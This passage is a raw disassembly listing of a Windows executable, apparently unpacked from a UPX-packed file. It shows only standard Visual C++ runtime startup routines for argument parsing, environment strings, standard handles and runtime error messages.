ecx push ecx push ebx xor ebx, ebx cmp ds:dword_4DCFF4, ebx push esi push edi jnz short loc_422F9A call sub_42026D loc_422F9A: ; CODE XREF: sub_422F83+10j mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe" push 104h push esi push ebx call dword_427070 ; GetModuleFileNameA mov eax, ds:dword_4DCFEC mov ds:off_4DB990, esi mov edi, esi cmp [eax], bl jz short loc_422FBF mov edi, eax loc_422FBF: ; CODE XREF: sub_422F83+38j lea eax, [ebp+var_8] push eax lea eax, [ebp+var_4] push eax push ebx push ebx push edi call sub_42301C mov eax, [ebp+var_8] mov ecx, [ebp+var_4] lea eax, [eax+ecx*4] push eax call sub_41B4D5 mov esi, eax add esp, 18h cmp esi, ebx jnz short loc_422FEF push 8 call sub_41DA29 pop ecx loc_422FEF: ; CODE XREF: sub_422F83+62j lea eax, [ebp+var_8] push eax lea eax, [ebp+var_4] push eax mov eax, [ebp+var_4] lea eax, [esi+eax*4] push eax push esi push edi call sub_42301C mov eax, [ebp+var_4] add esp, 14h dec eax mov ds:dword_4DB978, esi pop edi pop esi mov ds:dword_4DB974, eax pop ebx leave retn sub_422F83 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_42301C proc near ; CODE XREF: sub_422F83+47p ; sub_422F83+7Dp arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp mov ecx, [ebp+arg_10] mov eax, [ebp+arg_C] push ebx push esi and dword ptr [ecx], 0 mov esi, [ebp+arg_8] push edi mov edi, [ebp+arg_4] mov dword ptr [eax], 1 mov eax, [ebp+arg_0] test edi, edi jz short loc_423046 mov [edi], esi add edi, 4 mov [ebp+arg_4], edi loc_423046: ; CODE XREF: sub_42301C+20j cmp byte ptr [eax], 22h jnz short loc_42308F loc_42304B: ; CODE XREF: sub_42301C+58j ; sub_42301C+5Fj mov dl, [eax+1] inc eax cmp dl, 22h jz short loc_42307D test dl, dl jz short loc_42307D movzx edx, dl test ds:byte_4DCEC1[edx], 4 jz short loc_423070 inc dword ptr [ecx] test esi, esi jz short loc_423070 mov dl, [eax] mov [esi], dl inc esi inc eax loc_423070: ; CODE XREF: sub_42301C+46j ; sub_42301C+4Cj inc dword ptr [ecx] test esi, esi jz short loc_42304B mov dl, [eax] mov [esi], dl inc esi jmp short loc_42304B ; --------------------------------------------------------------------------- loc_42307D: ; CODE XREF: sub_42301C+36j ; sub_42301C+3Aj inc dword ptr [ecx] test esi, esi jz short loc_423087 and byte ptr [esi], 0 inc esi loc_423087: ; CODE XREF: sub_42301C+65j cmp byte ptr [eax], 22h jnz short loc_4230D2 inc eax jmp short loc_4230D2 ; --------------------------------------------------------------------------- loc_42308F: ; CODE XREF: sub_42301C+2Dj ; sub_42301C+A5j inc dword ptr [ecx] test esi, esi jz short loc_42309A mov dl, [eax] mov [esi], dl inc esi loc_42309A: ; CODE XREF: sub_42301C+77j mov dl, [eax] inc eax movzx ebx, dl test ds:byte_4DCEC1[ebx], 4 jz short loc_4230B5 inc dword ptr [ecx] test esi, esi jz short loc_4230B4 mov bl, [eax] mov [esi], bl inc esi loc_4230B4: ; CODE XREF: sub_42301C+91j inc eax loc_4230B5: ; CODE XREF: sub_42301C+8Bj cmp dl, 20h jz short loc_4230C3 test dl, dl jz short loc_4230C7 cmp dl, 9 jnz short loc_42308F loc_4230C3: ; CODE XREF: sub_42301C+9Cj test dl, dl jnz short loc_4230CA loc_4230C7: ; CODE XREF: sub_42301C+A0j dec eax jmp short loc_4230D2 ; --------------------------------------------------------------------------- loc_4230CA: ; CODE XREF: sub_42301C+A9j test esi, esi jz short loc_4230D2 and byte ptr [esi-1], 0 loc_4230D2: ; CODE XREF: sub_42301C+6Ej ; sub_42301C+71j ... and [ebp+arg_10], 0 loc_4230D6: ; CODE XREF: sub_42301C+19Ej cmp byte ptr [eax], 0 jz loc_4231BF loc_4230DF: ; CODE XREF: sub_42301C+D0j mov dl, [eax] cmp dl, 20h jz short loc_4230EB cmp dl, 9 jnz short loc_4230EE loc_4230EB: ; CODE XREF: sub_42301C+C8j inc eax jmp short loc_4230DF ; --------------------------------------------------------------------------- loc_4230EE: ; CODE XREF: sub_42301C+CDj cmp byte ptr [eax], 0 jz loc_4231BF test edi, edi jz short loc_423103 mov [edi], esi add edi, 4 mov [ebp+arg_4], edi loc_423103: ; CODE XREF: sub_42301C+DDj mov edx, [ebp+arg_C] inc dword ptr [edx] loc_423108: ; CODE XREF: sub_42301C+18Fj mov [ebp+arg_0], 1 xor ebx, ebx loc_423111: ; CODE XREF: sub_42301C+FCj cmp byte ptr [eax], 5Ch jnz short loc_42311A inc eax inc ebx jmp short loc_423111 ; --------------------------------------------------------------------------- loc_42311A: ; CODE XREF: sub_42301C+F8j cmp byte ptr [eax], 22h jnz short loc_42314B test bl, 1 jnz short loc_423149 xor edi, edi cmp [ebp+arg_10], edi jz short loc_423138 cmp byte ptr [eax+1], 22h lea edx, [eax+1] jnz short loc_423138 mov eax, edx jmp short loc_42313B ; --------------------------------------------------------------------------- loc_423138: ; CODE XREF: sub_42301C+10Dj ; sub_42301C+116j mov [ebp+arg_0], edi loc_42313B: ; CODE XREF: sub_42301C+11Aj mov edi, [ebp+arg_4] xor edx, edx cmp [ebp+arg_10], edx setz dl mov [ebp+arg_10], edx loc_423149: ; CODE XREF: sub_42301C+106j shr ebx, 1 loc_42314B: ; CODE XREF: sub_42301C+101j mov edx, ebx dec ebx test edx, edx jz short loc_423160 inc ebx loc_423153: ; CODE XREF: sub_42301C+142j test esi, esi jz short loc_42315B mov byte ptr [esi], 5Ch inc esi loc_42315B: ; CODE XREF: sub_42301C+139j inc dword ptr [ecx] dec ebx jnz short loc_423153 loc_423160: ; CODE XREF: sub_42301C+134j mov dl, [eax] test dl, dl jz short loc_4231B0 cmp [ebp+arg_10], 0 jnz short loc_423176 cmp dl, 20h jz short loc_4231B0 cmp dl, 9 jz short loc_4231B0 loc_423176: ; CODE XREF: sub_42301C+14Ej cmp [ebp+arg_0], 0 jz short loc_4231AA test esi, esi jz short loc_423199 movzx ebx, dl test ds:byte_4DCEC1[ebx], 4 jz short loc_423192 mov [esi], dl inc esi inc eax inc dword ptr [ecx] loc_423192: ; CODE XREF: sub_42301C+16Ej mov dl, [eax] mov [esi], dl inc esi jmp short loc_4231A8 ; --------------------------------------------------------------------------- loc_423199: ; CODE XREF: sub_42301C+162j movzx edx, dl test ds:byte_4DCEC1[edx], 4 jz short loc_4231A8 inc eax inc dword ptr [ecx] loc_4231A8: ; CODE XREF: sub_42301C+17Bj ; sub_42301C+187j inc dword ptr [ecx] loc_4231AA: ; CODE XREF: sub_42301C+15Ej inc eax jmp loc_423108 ; --------------------------------------------------------------------------- loc_4231B0: ; CODE XREF: sub_42301C+148j ; sub_42301C+153j ... test esi, esi jz short loc_4231B8 and byte ptr [esi], 0 inc esi loc_4231B8: ; CODE XREF: sub_42301C+196j inc dword ptr [ecx] jmp loc_4230D6 ; --------------------------------------------------------------------------- loc_4231BF: ; CODE XREF: sub_42301C+BDj ; sub_42301C+D5j test edi, edi jz short loc_4231C6 and dword ptr [edi], 0 loc_4231C6: ; CODE XREF: sub_42301C+1A5j mov eax, [ebp+arg_C] pop edi pop esi pop ebx inc dword ptr [eax] pop ebp retn sub_42301C endp ; =============== S U B R O U T I N E ======================================= sub_4231D0 proc near ; CODE XREF: UPX0:0041D9B2p var_8 = dword ptr -8 var_4 = dword ptr -4 push ecx push ecx mov eax, ds:dword_4DBB38 push ebx push ebp mov ebp, dword_42703C push esi push edi xor ebx, ebx xor esi, esi xor edi, edi cmp eax, ebx jnz short loc_42321E call ebp ; GetEnvironmentStringsW mov esi, eax cmp esi, ebx jz short loc_4231FF mov ds:dword_4DBB38, 1 jmp short loc_423227 ; --------------------------------------------------------------------------- loc_4231FF: ; CODE XREF: sub_4231D0+21j call dword_427040 ; GetEnvironmentStrings mov edi, eax cmp edi, ebx jz loc_4232F9 mov ds:dword_4DBB38, 2 jmp loc_4232AD ; --------------------------------------------------------------------------- loc_42321E: ; CODE XREF: sub_4231D0+19j cmp eax, 1 jnz loc_4232A8 loc_423227: ; CODE XREF: sub_4231D0+2Dj cmp esi, ebx jnz short loc_423237 call ebp ; GetEnvironmentStringsW mov esi, eax cmp esi, ebx jz loc_4232F9 loc_423237: ; CODE XREF: sub_4231D0+59j cmp [esi], bx mov eax, esi jz short loc_42324C loc_42323E: ; CODE XREF: sub_4231D0+73j ; sub_4231D0+7Aj inc eax inc eax cmp [eax], bx jnz short loc_42323E inc eax inc eax cmp [eax], bx jnz short loc_42323E loc_42324C: ; CODE XREF: sub_4231D0+6Cj sub eax, esi mov edi, dword_42717C sar eax, 1 push ebx push ebx inc eax push ebx push ebx push eax push esi push ebx push ebx mov [esp+38h+var_4], eax call edi ; WideCharToMultiByte mov ebp, eax cmp ebp, ebx jz short loc_42329D push ebp call sub_41B4D5 cmp eax, ebx pop ecx mov [esp+18h+var_8], eax jz short loc_42329D push ebx push ebx push ebp push eax push [esp+28h+var_4] push esi push ebx push ebx call edi ; WideCharToMultiByte test eax, eax jnz short loc_423299 push [esp+18h+var_8] call sub_41B0B1 pop ecx mov [esp+18h+var_8], ebx loc_423299: ; CODE XREF: sub_4231D0+B9j mov ebx, [esp+18h+var_8] loc_42329D: ; CODE XREF: sub_4231D0+99j ; sub_4231D0+A8j push esi call dword_427044 ; FreeEnvironmentStringsW mov eax, ebx jmp short loc_4232FB ; --------------------------------------------------------------------------- loc_4232A8: ; CODE XREF: sub_4231D0+51j cmp eax, 2 jnz short loc_4232F9 loc_4232AD: ; CODE XREF: sub_4231D0+49j cmp edi, ebx jnz short loc_4232BD call dword_427040 ; GetEnvironmentStrings mov edi, eax cmp edi, ebx jz short loc_4232F9 loc_4232BD: ; CODE XREF: sub_4231D0+DFj cmp [edi], bl mov eax, edi jz short loc_4232CD loc_4232C3: ; CODE XREF: sub_4231D0+F6j ; sub_4231D0+FBj inc eax cmp [eax], bl jnz short loc_4232C3 inc eax cmp [eax], bl jnz short loc_4232C3 loc_4232CD: ; CODE XREF: sub_4231D0+F1j sub eax, edi inc eax mov ebp, eax push ebp call sub_41B4D5 mov esi, eax pop ecx cmp esi, ebx jnz short loc_4232E3 xor esi, esi jmp short loc_4232EE ; --------------------------------------------------------------------------- loc_4232E3: ; CODE XREF: sub_4231D0+10Dj push ebp push edi push esi call sub_41C310 add esp, 0Ch loc_4232EE: ; CODE XREF: sub_4231D0+111j push edi call dword_427048 ; FreeEnvironmentStringsA mov eax, esi jmp short loc_4232FB ; --------------------------------------------------------------------------- loc_4232F9: ; CODE XREF: sub_4231D0+39j ; sub_4231D0+61j ... xor eax, eax loc_4232FB: ; CODE XREF: sub_4231D0+D6j ; sub_4231D0+127j pop edi pop esi pop ebp pop ebx pop ecx pop ecx retn sub_4231D0 endp ; =============== S U B R O U T I N E ======================================= sub_423302 proc near ; CODE XREF: UPX0:0041D9A2p var_44 = byte ptr -44h var_14 = dword ptr -14h var_10 = dword ptr -10h sub esp, 44h push ebx push ebp push esi push edi push 100h call sub_41B4D5 mov esi, eax pop ecx test esi, esi jnz short loc_423322 push 1Bh call sub_41DA29 pop ecx loc_423322: ; CODE XREF: sub_423302+16j mov ds:dword_4DCCA0, esi mov ds:dword_4DCDA0, 20h lea eax, [esi+100h] loc_423338: ; CODE XREF: sub_423302+52j cmp esi, eax jnb short loc_423356 and byte ptr [esi+4], 0 or dword ptr [esi], 0FFFFFFFFh mov byte ptr [esi+5], 0Ah mov eax, ds:dword_4DCCA0 add esi, 8 add eax, 100h jmp short loc_423338 ; --------------------------------------------------------------------------- loc_423356: ; CODE XREF: sub_423302+38j lea eax, [esp+54h+var_44] push eax call dword_4271A8 ; GetStartupInfoA cmp word ptr [esp+54h+var_14+2], 0 jz loc_423432 mov eax, [esp+54h+var_10] test eax, eax jz loc_423432 mov esi, [eax] lea ebp, [eax+4] mov eax, 800h cmp esi, eax lea ebx, [esi+ebp] jl short loc_42338C mov esi, eax loc_42338C: ; CODE XREF: sub_423302+86j cmp ds:dword_4DCDA0, esi jge short loc_4233E6 mov edi, offset dword_4DCCA4 loc_423399: ; CODE XREF: sub_423302+DAj push 100h call sub_41B4D5 test eax, eax pop ecx jz short loc_4233E0 add ds:dword_4DCDA0, 20h mov [edi], eax lea ecx, [eax+100h] loc_4233B7: ; CODE XREF: sub_423302+CFj cmp eax, ecx jnb short loc_4233D3 and byte ptr [eax+4], 0 or dword ptr [eax], 0FFFFFFFFh mov byte ptr [eax+5], 0Ah mov ecx, [edi] add eax, 8 add ecx, 100h jmp short loc_4233B7 ; --------------------------------------------------------------------------- loc_4233D3: ; CODE XREF: sub_423302+B7j add edi, 4 cmp ds:dword_4DCDA0, esi jl short loc_423399 jmp short loc_4233E6 ; --------------------------------------------------------------------------- loc_4233E0: ; CODE XREF: sub_423302+A4j mov esi, ds:dword_4DCDA0 loc_4233E6: ; CODE XREF: sub_423302+90j ; sub_423302+DCj xor edi, edi test esi, esi jle short loc_423432 loc_4233EC: ; CODE XREF: sub_423302+12Ej mov eax, [ebx] cmp eax, 0FFFFFFFFh jz short loc_423429 mov cl, [ebp+0] test cl, 1 jz short loc_423429 test cl, 8 jnz short loc_42340B push eax call dword_427030 ; GetFileType test eax, eax jz short loc_423429 loc_42340B: ; CODE XREF: sub_423302+FCj mov eax, edi mov ecx, edi sar eax, 5 and ecx, 1Fh mov eax, ds:dword_4DCCA0[eax*4] lea eax, [eax+ecx*8] mov ecx, [ebx] mov [eax], ecx mov cl, [ebp+0] mov [eax+4], cl loc_423429: ; CODE XREF: sub_423302+EFj ; sub_423302+F7j ... inc edi inc ebp add ebx, 4 cmp edi, esi jl short loc_4233EC loc_423432: ; CODE XREF: sub_423302+65j ; sub_423302+71j ... xor ebx, ebx loc_423434: ; CODE XREF: sub_423302+195j mov eax, ds:dword_4DCCA0 cmp dword ptr [eax+ebx*8], 0FFFFFFFFh lea esi, [eax+ebx*8] jnz short loc_42348F test ebx, ebx mov byte ptr [esi+4], 81h jnz short loc_42344F push 0FFFFFFF6h pop eax jmp short loc_423459 ; --------------------------------------------------------------------------- loc_42344F: ; CODE XREF: sub_423302+146j mov eax, ebx dec eax neg eax sbb eax, eax add eax, 0FFFFFFF5h loc_423459: ; CODE XREF: sub_423302+14Bj push eax call dword_427034 ; GetStdHandle mov edi, eax cmp edi, 0FFFFFFFFh jz short loc_42347E push edi call dword_427030 ; GetFileType test eax, eax jz short loc_42347E and eax, 0FFh mov [esi], edi cmp eax, 2 jnz short loc_423484 loc_42347E: ; CODE XREF: sub_423302+163j ; sub_423302+16Ej or byte ptr [esi+4], 40h jmp short loc_423493 ; --------------------------------------------------------------------------- loc_423484: ; CODE XREF: sub_423302+17Aj cmp eax, 3 jnz short loc_423493 or byte ptr [esi+4], 8 jmp short loc_423493 ; --------------------------------------------------------------------------- loc_42348F: ; CODE XREF: sub_423302+13Ej or byte ptr [esi+4], 80h loc_423493: ; CODE XREF: sub_423302+180j ; sub_423302+185j ... inc ebx cmp ebx, 3 jl short loc_423434 push ds:dword_4DCDA0 call dword_427038 ; LockResource pop edi pop esi pop ebp pop ebx add esp, 44h retn sub_423302 endp ; --------------------------------------------------------------------------- align 10h push esi inc ebx xor dh, [eax] pop eax inc ebx xor [eax], dh ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4234B8 proc near ; DATA XREF: UPX0:0041D93Do ; sub_42205D+Ao ... var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 8 push ebx push esi push edi push ebp cld mov ebx, [ebp+arg_4] mov eax, [ebp+arg_0] test dword ptr [eax+4], 6 jnz loc_423558 mov [ebp+var_8], eax mov eax, [ebp+arg_8] mov [ebp+var_4], eax lea eax, [ebp+var_8] mov [ebx-4], eax mov esi, [ebx+0Ch] mov edi, [ebx+8] loc_4234EB: ; CODE XREF: sub_4234B8+90j cmp esi, 0FFFFFFFFh jz short loc_423551 lea ecx, [esi+esi*2] cmp dword ptr [edi+ecx*4+4], 0 jz short loc_42353F push esi push ebp lea ebp, [ebx+10h] call dword ptr [edi+ecx*4+4] pop ebp pop esi mov ebx, [ebp+arg_4] or eax, eax jz short loc_42353F js short loc_42354A mov edi, [ebx+8] push ebx call sub_41CB74 add esp, 4 lea ebp, [ebx+10h] push esi push ebx call sub_41CBB6 add esp, 8 lea ecx, [esi+esi*2] push 1 mov eax, [edi+ecx*4+8] call sub_41CC4A mov eax, [edi+ecx*4] mov [ebx+0Ch], eax call dword ptr [edi+ecx*4+8] loc_42353F: ; CODE XREF: sub_4234B8+40j ; sub_4234B8+52j mov edi, [ebx+8] lea ecx, [esi+esi*2] mov esi, [edi+ecx*4] jmp short loc_4234EB ; --------------------------------------------------------------------------- loc_42354A: ; CODE XREF: sub_4234B8+54j mov eax, 0 jmp short loc_42356D ; --------------------------------------------------------------------------- loc_423551: ; CODE XREF: sub_4234B8+36j mov eax, 1 jmp short loc_42356D ; --------------------------------------------------------------------------- loc_423558: ; CODE XREF: sub_4234B8+18j push ebp lea ebp, [ebx+10h] push 0FFFFFFFFh push ebx call sub_41CBB6 add esp, 8 pop ebp mov eax, 1 loc_42356D: ; CODE XREF: sub_4234B8+97j ; sub_4234B8+9Ej pop ebp pop edi pop esi pop ebx mov esp, ebp pop ebp retn sub_4234B8 endp ; --------------------------------------------------------------------------- push ebp mov ecx, [esp+8] mov ebp, [ecx] mov eax, [ecx+1Ch] push eax mov eax, [ecx+18h] push eax call sub_41CBB6 add esp, 8 pop ebp retn 4 ; =============== S U B R O U T I N E ======================================= sub_423590 proc near ; CODE XREF: sub_41DA29+9p ; sub_41DA4E+9p mov eax, ds:dword_4DB9D0 cmp eax, 1 jz short loc_4235A7 test eax, eax jnz short locret_4235C8 cmp dword_43A9A4, 1 jnz short locret_4235C8 loc_4235A7: ; CODE XREF: sub_423590+8j push 0FCh call sub_4235C9 mov eax, ds:dword_4DBB3C pop ecx test eax, eax jz short loc_4235BD call eax loc_4235BD: ; CODE XREF: sub_423590+29j push 0FFh call sub_4235C9 pop ecx locret_4235C8: ; CODE XREF: sub_423590+Cj ; sub_423590+15j retn sub_423590 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4235C9 proc near ; CODE XREF: sub_41DA29+12p ; sub_41DA4E+12p ... var_1A4 = byte ptr -1A4h var_A0 = byte ptr -0A0h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 1A4h mov edx, [ebp+arg_0] xor ecx, ecx mov eax, offset dword_43D038 loc_4235DC: ; CODE XREF: sub_4235C9+20j cmp edx, [eax] jz short loc_4235EB add eax, 8 inc ecx cmp eax, offset off_43D0C8 jl short loc_4235DC loc_4235EB: ; CODE XREF: sub_4235C9+15j push esi mov esi, ecx shl esi, 3 cmp edx, dword_43D038[esi] jnz loc_423719 mov eax, ds:dword_4DB9D0 cmp eax, 1 jz loc_4236F3 test eax, eax jnz short loc_42361C cmp dword_43A9A4, 1 jz loc_4236F3 loc_42361C: ; CODE XREF: sub_4235C9+44j cmp edx, 0FCh jz loc_423719 lea eax, [ebp+var_1A4] push 104h push eax push 0 call dword_427070 ; GetModuleFileNameA test eax, eax jnz short loc_423653 lea eax, [ebp+var_1A4] push offset aProgramNameUnk ; "<program name unknown>" push eax call sub_41BEB0 pop ecx pop ecx loc_423653: ; CODE XREF: sub_4235C9+75j lea eax, [ebp+var_1A4] push edi push eax lea edi, [ebp+var_1A4] call sub_41AFE0 inc eax pop ecx cmp eax, 3Ch jbe short loc_423696 lea eax, [ebp+var_1A4] push eax call sub_41AFE0 mov edi, eax lea eax, [ebp+var_1A4] sub eax, 3Bh push 3 add edi, eax push offset a___ ; "..." push edi call sub_41B5F0 add esp, 10h loc_423696: ; CODE XREF: sub_4235C9+A2j lea eax, [ebp+var_A0] push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: " push eax call sub_41BEB0 lea eax, [ebp+var_A0] push edi push eax call sub_41BEC0 lea eax, [ebp+var_A0] push offset asc_427C08 ; "\n\n" push eax call sub_41BEC0 push off_43D03C[esi] lea eax, [ebp+var_A0] push eax call sub_41BEC0 push 12010h lea eax, [ebp+var_A0] push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library" push eax call sub_424D78 add esp, 2Ch pop edi jmp short loc_423719 ; --------------------------------------------------------------------------- loc_4236F3: ; CODE XREF: sub_4235C9+3Cj ; sub_4235C9+4Dj lea eax, [ebp+arg_0] lea esi, off_43D03C[esi] push 0 push eax push dword ptr [esi] call sub_41AFE0 pop ecx push eax push dword ptr [esi] push 0FFFFFFF4h call dword_427034 ; GetStdHandle push eax call dword_4270E0 ; WriteFile loc_423719: ; CODE XREF: sub_4235C9+2Ej ; sub_4235C9+59j ... pop esi leave retn sub_4235C9 endp ; =============== S U B R O U T I N E ======================================= sub_42371C proc near ; CODE XREF: sub_423A33:loc_423BABp push ebx push esi push edi or ebx, 0FFFFFFFFh xor edi, edi xor esi, esi mov ecx, offset dword_4DCCA0 loc_42372B: ; CODE XREF: sub_42371C+48j mov eax, [ecx] test eax, eax jz short loc_423768 lea edx, [eax+100h] loc_423737: ; CODE XREF: sub_42371C+28j cmp eax, edx jnb short loc_423757 test byte ptr [eax+4], 1 jz short loc_423746 add eax, 8 jmp short loc_423737 ; --------------------------------------------------------------------------- loc_423746: ; CODE XREF: sub_42371C+23j or dword ptr [eax], 0FFFFFFFFh sub eax, [ecx] sar eax, 3 add eax, esi mov ebx, eax cmp ebx, 0FFFFFFFFh jnz short loc_4237AB loc_423757: ; CODE XREF: sub_42371C+1Dj add ecx, 4 inc edi add esi, 20h cmp ecx, offset dword_4DCDA0 jl short loc_42372B jmp short loc_4237AB ; --------------------------------------------------------------------------- loc_423768: ; CODE XREF: sub_42371C+13j mov esi, 100h push esi call sub_41B4D5 test eax, eax pop ecx jz short loc_4237AB add ds:dword_4DCDA0, 20h lea ecx, ds:4DCCA0h[edi*4] lea edx, [eax+100h] mov [ecx], eax loc_42378E: ; CODE XREF: sub_42371C+88j cmp eax, edx jnb short loc_4237A6 and byte ptr [eax+4], 0 or dword ptr [eax], 0FFFFFFFFh mov byte ptr [eax+5], 0Ah mov edx, [ecx] add eax, 8 add edx, esi jmp short loc_42378E ; --------------------------------------------------------------------------- loc_4237A6: ; CODE XREF: sub_42371C+74j shl edi, 5 mov ebx, edi loc_4237AB: ; CODE XREF: sub_42371C+39j ; sub_42371C+4Aj ... pop edi mov eax, ebx pop esi pop ebx retn sub_42371C endp ; =============== S U B R O U T I N E ======================================= sub_4237B1 proc near ; CODE XREF: sub_423A33+1F4p arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov eax, [esp+arg_0] push esi cmp eax, ds:dword_4DCDA0 push edi jnb short loc_423811 mov ecx, eax mov esi, eax sar ecx, 5 and esi, 1Fh lea edi, ds:4DCCA0h[ecx*4] shl esi, 3 mov ecx, [edi] cmp dword ptr [ecx+esi], 0FFFFFFFFh jnz short loc_423811 cmp dword_43A9A4, 1 push ebx mov ebx, [esp+0Ch+arg_4] jnz short loc_423807 sub eax, 0 jz short loc_4237FE dec eax jz short loc_4237F9 dec eax jnz short loc_423807 push ebx push 0FFFFFFF4h jmp short loc_423801 ; --------------------------------------------------------------------------- loc_4237F9: ; CODE XREF: sub_4237B1+3Ej push ebx push 0FFFFFFF5h jmp short loc_423801 ; --------------------------------------------------------------------------- loc_4237FE: ; CODE XREF: sub_4237B1+3Bj push ebx push 0FFFFFFF6h loc_423801: ; CODE XREF: sub_4237B1+46j ; sub_4237B1+4Bj call dword_42702C ; SetStdHandle loc_423807: ; CODE XREF: sub_4237B1+36j ; sub_4237B1+41j mov eax, [edi] mov [eax+esi], ebx xor eax, eax pop ebx jmp short loc_423825 ; --------------------------------------------------------------------------- loc_423811: ; CODE XREF: sub_4237B1+Cj ; sub_4237B1+28j and ds:dword_4DB95C, 0 mov ds:dword_4DB958, 9 or eax, 0FFFFFFFFh loc_423825: ; CODE XREF: sub_4237B1+5Ej pop edi pop esi retn sub_4237B1 endp ; =============== S U B R O U T I N E ======================================= sub_423828 proc near ; CODE XREF: sub_41DA72+7Cp arg_0 = dword ptr 4 mov ecx, [esp+arg_0] push esi cmp ecx, ds:dword_4DCDA0 push edi jnb short loc_42388B mov eax, ecx mov esi, ecx sar eax, 5 and esi, 1Fh lea edi, ds:4DCCA0h[eax*4] shl esi, 3 mov eax, [edi] add eax, esi test byte ptr [eax+4], 1 jz short loc_42388B cmp dword ptr [eax], 0FFFFFFFFh jz short loc_42388B cmp dword_43A9A4, 1 jnz short loc_423881 xor eax, eax sub ecx, eax jz short loc_423878 dec ecx jz short loc_423873 dec ecx jnz short loc_423881 push eax push 0FFFFFFF4h jmp short loc_42387B ; --------------------------------------------------------------------------- loc_423873: ; CODE XREF: sub_423828+41j push eax push 0FFFFFFF5h jmp short loc_42387B ; --------------------------------------------------------------------------- loc_423878: ; CODE XREF: sub_423828+3Ej push eax push 0FFFFFFF6h loc_42387B: ; CODE XREF: sub_423828+49j ; sub_423828+4Ej call dword_42702C ; SetStdHandle loc_423881: ; CODE XREF: sub_423828+38j ; sub_423828+44j mov eax, [edi] or dword ptr [eax+esi], 0FFFFFFFFh xor eax, eax jmp short loc_42389F ; --------------------------------------------------------------------------- loc_42388B: ; CODE XREF: sub_423828+Cj ; sub_423828+2Aj ... and ds:dword_4DB95C, 0 mov ds:dword_4DB958, 9 or eax, 0FFFFFFFFh loc_42389F: ; CODE XREF: sub_423828+61j pop edi pop esi retn sub_423828 endp ; =============== S U B R O U T I N E ======================================= sub_4238A2 proc near ; CODE XREF: sub_41DA72+32p ; sub_41DA72+49p ... arg_0 = dword ptr 4 mov eax, [esp+arg_0] cmp eax, ds:dword_4DCDA0 jnb short loc_4238CA mov ecx, eax and eax, 1Fh sar ecx, 5 mov ecx, ds:dword_4DCCA0[ecx*4] test byte ptr [ecx+eax*8+4], 1 lea eax, [ecx+eax*8] jz short loc_4238CA mov eax, [eax] retn ; --------------------------------------------------------------------------- loc_4238CA: ; CODE XREF: sub_4238A2+Aj ; sub_4238A2+23j and ds:dword_4DB95C, 0 mov ds:dword_4DB958, 9 or eax, 0FFFFFFFFh retn sub_4238A2 endp ; =============== S U B R O U T I N E ======================================= sub_4238DF proc near ; CODE XREF: sub_41DB50+2Bp arg_0 = dword ptr 4 mov eax, [esp+arg_0] cmp eax, ds:dword_4DCDA0 jnb short loc_423928 mov ecx, eax mov edx, eax sar ecx, 5 and edx, 1Fh mov ecx, ds:dword_4DCCA0[ecx*4] test byte ptr [ecx+edx*8+4], 1 jz short loc_423928 push eax call sub_4238A2 pop ecx push eax call dword_427028 ; FlushFileBuffers test eax, eax jnz short loc_42391D call dword_42708C ; RtlGetLastWin32Error jmp short loc_42391F ; --------------------------------------------------------------------------- loc_42391D: ; CODE XREF: sub_4238DF+34j xor eax, eax loc_42391F: ; CODE XREF: sub_4238DF+3Cj test eax, eax jz short locret_423935 mov ds:dword_4DB95C, eax loc_423928: ; CODE XREF: sub_4238DF+Aj ; sub_4238DF+22j mov ds:dword_4DB958, 9 or eax, 0FFFFFFFFh locret_423935: ; CODE XREF: sub_4238DF+42j retn sub_4238DF endp ; =============== S U B R O U T I N E ======================================= sub_423936 proc near ; DATA XREF: UPX0:00429024o mov eax, ds:dword_4DCC80 push esi push 14h test eax, eax pop esi jnz short loc_42394A mov eax, 200h jmp short loc_423950 ; --------------------------------------------------------------------------- loc_42394A: ; CODE XREF: sub_423936+Bj cmp eax, esi jge short loc_423955 mov eax, esi loc_423950: ; CODE XREF: sub_423936+12j mov ds:dword_4DCC80, eax loc_423955: ; CODE XREF: sub_423936+16j push 4 push eax call sub_424E01 pop ecx mov ds:dword_4DBC78, eax test eax, eax pop ecx jnz short loc_423989 push 4 push esi mov ds:dword_4DCC80, esi call sub_424E01 pop ecx mov ds:dword_4DBC78, eax test eax, eax pop ecx jnz short loc_423989 push 1Ah call sub_41DA29 pop ecx loc_423989: ; CODE XREF: sub_423936+30j ; sub_423936+49j xor ecx, ecx mov eax, offset off_43D0C8 loc_423990: ; CODE XREF: sub_423936+6Ej mov edx, ds:dword_4DBC78 mov [ecx+edx], eax add eax, 20h add ecx, 4 cmp eax, offset dword_43D348 jl short loc_423990 xor edx, edx mov ecx, offset dword_43D0D8 loc_4239AD: ; CODE XREF: sub_423936+A1j mov eax, edx mov esi, edx sar eax, 5 and esi, 1Fh mov eax, ds:dword_4DCCA0[eax*4] mov eax, [eax+esi*8] cmp eax, 0FFFFFFFFh jz short loc_4239CA test eax, eax jnz short loc_4239CD loc_4239CA: ; CODE XREF: sub_423936+8Ej or dword ptr [ecx], 0FFFFFFFFh loc_4239CD: ; CODE XREF: sub_423936+92j add ecx, 20h inc edx cmp ecx, offset dword_43D138 jl short loc_4239AD pop esi retn sub_423936 endp ; =============== S U B R O U T I N E ======================================= sub_4239DB proc near ; DATA XREF: UPX0:00429034o ; FUNCTION CHUNK AT 00424EB2 SIZE 00000058 BYTES call sub_41DBE7 cmp ds:byte_4DB998, 0 jz short locret_4239EE jmp loc_424EB2 ; --------------------------------------------------------------------------- locret_4239EE: ; CODE XREF: sub_4239DB+Cj retn sub_4239DB endp ; =============== S U B R O U T I N E ======================================= sub_4239EF proc near ; CODE XREF: sub_41F043+32p ; sub_41F58A+6Cp ... arg_0 = dword ptr 4 inc ds:dword_4DBB40 push 1000h call sub_41B4D5 pop ecx mov ecx, [esp+arg_0] test eax, eax mov [ecx+8], eax jz short loc_423A18 or dword ptr 